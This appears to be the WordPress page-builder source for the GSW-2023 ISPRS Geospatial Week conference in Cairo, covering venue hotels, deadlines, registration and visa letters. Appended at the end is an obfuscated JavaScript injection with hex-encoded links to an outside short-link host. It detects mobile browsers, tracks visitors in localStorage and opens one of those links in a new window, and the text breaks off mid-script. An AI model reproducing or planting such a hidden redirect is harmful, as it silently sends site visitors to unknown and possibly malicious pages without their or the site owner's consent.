css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#686868\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><strong>-Camera ready paper submission: July 15, 2023</strong></h5>\n</li>\n</ul>\n<h5 style=\"text-align: center;\"></h5>\n<ul style=\"text-align: center;\">\n<li style=\"text-align: left;\">\n<h5><strong>-Deadline for submission of travel grants                                           funded by </strong><strong style=\"text-align: center;\">The ISPRS Foundation is: June 16, 2023</strong></h5>\n</li>\n</ul>\n<h5 style=\"text-align: center;\"></h5>\n<ul>\n<li style=\"text-align: left;\">\n<h5><strong>-Early bird registration deadline: July 1, 2023</strong></h5>\n</li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" button_alignment=\"btn_center\" css=\".vc_custom_1686689514453{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686320769324{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation Letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your Name (as it appears in your passport), PassportNumber ,Nationality and Your Organization .</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function 